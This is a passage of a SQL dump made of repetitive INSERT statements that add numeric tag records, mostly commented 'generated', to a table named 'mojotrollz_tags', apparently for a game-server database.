`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3561, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3562, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3566, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3567, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3568, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3571, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3571, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3572, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3572, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3572, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3572, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3572, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3573, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3574, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3577, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3577, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3578, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3579, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3581, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3581, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3582, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3583, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3583, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3584, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3584, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3585, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3585, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3586, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3586, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3586, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3587, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3587, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3588, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3588, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3589, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3589, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3590, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3590, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3591, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3591, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3592, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3592, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3593, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3593, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3594, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3594, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3595, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3595, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3596, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3596, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3597, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3597, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3598, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3599, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3599, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3600, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3600, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3601, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3601, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3602, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3602, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3603, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3604, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3604, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3605, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3605, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3606, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3607, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3607, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3608, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3608, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3609, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3609, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3610, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3610, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3611, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3611, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3612, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3612, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3613, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3613, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3614, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3614, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3615, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3615, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3615, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3615, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3615, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3616, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3617, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3619, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3620, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3620, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3620, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3620, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3620, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3621, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3621, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3622, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3622, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3624, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3624, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3625, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3625, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3625, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3626, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3626, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3627, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3627, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3628, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3628, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3629, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3629, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3630, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3630, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3631, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3631, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3632, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3632, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3633, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3633, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3634, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3634, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3636, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3636, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3636, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3637, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3637, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3637, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3638, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3638, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3639, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3639, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3640, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3640, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3640, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3641, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3641, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3644, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3644, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3649, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3649, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3650, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3650, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3652, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3653, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3653, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3653, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3654, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3655, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3655, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3657, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3658, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3658, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3658, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3658, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3659, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3659, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3659, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3659, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3660, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3661, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3662, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3662, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3663, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3663, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3664, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3665, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3665, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3665, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3665, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3665, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3666, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3667, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3669, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3669, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3669, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3670, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3670, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3670, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3671, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3671, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3671, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3672, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3672, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3673, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3673, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3673, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3674, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3674, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3674, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3678, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3678, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3678, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3679, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3679, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3679, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3680, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3681, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3682, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3682, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3682, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3682, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3683, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3684, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3685, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3688, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3689, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3690, 1, 1, 1, 'generated'); INSERT INTO 